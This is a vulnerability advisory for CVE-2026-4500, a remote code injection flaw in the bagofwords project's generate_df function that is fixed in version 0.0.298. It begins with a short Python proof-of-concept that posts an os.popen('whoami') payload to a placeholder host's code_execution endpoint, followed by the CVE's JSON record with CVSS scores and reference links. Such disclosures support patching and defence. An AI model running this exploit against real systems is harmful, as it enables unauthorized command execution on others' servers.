CVE-2026-4500

import requests # PoC for CVE-2026-4500: Code Injection in bagofwords # Target the generate_df function target = 'http://vulnerable-host:port/api/ai/code_execution' # Malicious payload to execute 'whoami' command payload = { 'code': "__import__('os').popen('whoami').read()" } try: r = requests.post(target, json=payload) if r.status_code == 200: print("Exploit successful! Response:") print(r.text) else: print(f"Failed, status code: {r.status_code}") except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2026-4500", "sourceIdentifier": "[email protected]", "published": "2026-03-20T20:16:50.450", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in bagofwords1 bagofwords up to 0.0.297. This impacts the function generate_df of the file backend/app/ai/code_execution/code_execution.py. Such manipulation leads to injection. The attack may be launched remotely. The exploit is publicly available and might be used. Upgrading to version 0.0.298 will fix this issue. The name of the patch is 47b20bcda31264635faff7f6b1c8095abe1861c6. It is recommended to upgrade the affected component."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en bagofwords1 bagofwords hasta la versión 0.0.297. Esto afecta la función generate_df del archivo backend/app/ai/code_execution/code_execution.py. Dicha manipulación conduce a inyección. El ataque puede ser lanzado remotamente. El exploit está disponible públicamente y podría ser utilizado. Actualizar a la versión 0.0.298 solucionará este problema. El nombre del parche es 47b20bcda31264635faff7f6b1c8095abe1861c6. Se recomienda actualizar el componente afectado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-707"}]}], "references": [{"url": "https://github.com/Ka7arotto/cve/blob/main/bagofwords-rce.md", "source": "[email protected]"}, {"url": "https://github.com/bagofwords1/bagofwords/", "source": "[email protected]"}, {"url": "https://github.com/bagofwords1/bagofwords/commit/47b20bcda31264635faff7f6b1c8095abe1861c6", "source": "[email protected]"}, {"url": "https://github.com/bagofwords1/bagofwords/issues/60", "source": "[email protected]"}, {"url": "https://github.com/bagofwords1/bagofwords/pull/63", "source": "[email protected]"}, {"url": "https://github.com/bagofwords1/bagofwords/releases/tag/v0.0.298", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352065", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352065", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773890", "source": "[email protected]"}]}}